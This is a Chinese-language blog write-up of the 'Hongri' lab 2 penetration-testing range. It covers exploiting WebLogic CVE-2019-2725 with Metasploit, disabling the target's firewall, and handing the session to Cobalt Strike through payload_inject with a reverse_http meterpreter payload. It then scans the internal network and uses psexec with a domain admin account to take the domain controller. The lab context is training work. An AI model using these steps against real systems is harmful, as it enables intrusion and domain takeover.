红日靶场二

一、所需环境

web端(双网卡)pc主机(双网卡)dc
web端开启weblogic服务,360安全卫士
二、信息收集
1、目标主机探测

2、端口扫描

发现开启了许多高危端口,比如:7001、3389、445等
3、对7001weblogic端口就行漏洞扫描--->工具(Vscan-plus)

发现扫出了一些cve漏洞,然后逐个尝试
三、打点
1、访问weblogic页面

没啥东西接着就是对该服务的漏洞利用了
2、使用msf就行漏洞利用
经过多次尝试觉得使用cve-2019-2725漏洞可以成功使用,而且不会被杀软拦截



发现已经成功获得了对方的shell,查看了一下权限,发现是administrator还行,使用getsystem提权失败,则想着将对方的防火墙关闭掉,一边后续的渗透操作

接着就是查看一下目标机器的IP信息

发现还有一个内网地址,然后接着使用systeminfo看一下目标主机打了那些补丁

然后还发现了域 de1ay.com
四、内网渗透
1、msf委派cs上线
use exploit/windows/local/payload_inject
set session 1
set lport 5757
set DisablePayloadHandler true
set payload windows/meterpreter/reverse_http

cs配置监听模块

成功委派上线
2、爬取域管的账户密码

确定域管理员
shell net user /domain

发现此处不能直接查看,要在域控内才行,接着就是对其余的主机就行横向渗透
3、内网端口扫描
portscan 10.10.10.0/24 1-1024,3389,5000-6000 arp 1024


发现了两个主机一个是pc,另一个是dc,然后就是通过使用psexec,使用域管理员账户登陆dc




发现dc已成功拿下,pc同理

横向渗透完成

posted @ 2024-07-12 00:40  小小狂徒  阅读(47)  评论(0)    收藏  举报
//雪花飘落效果 //雪花飘落效果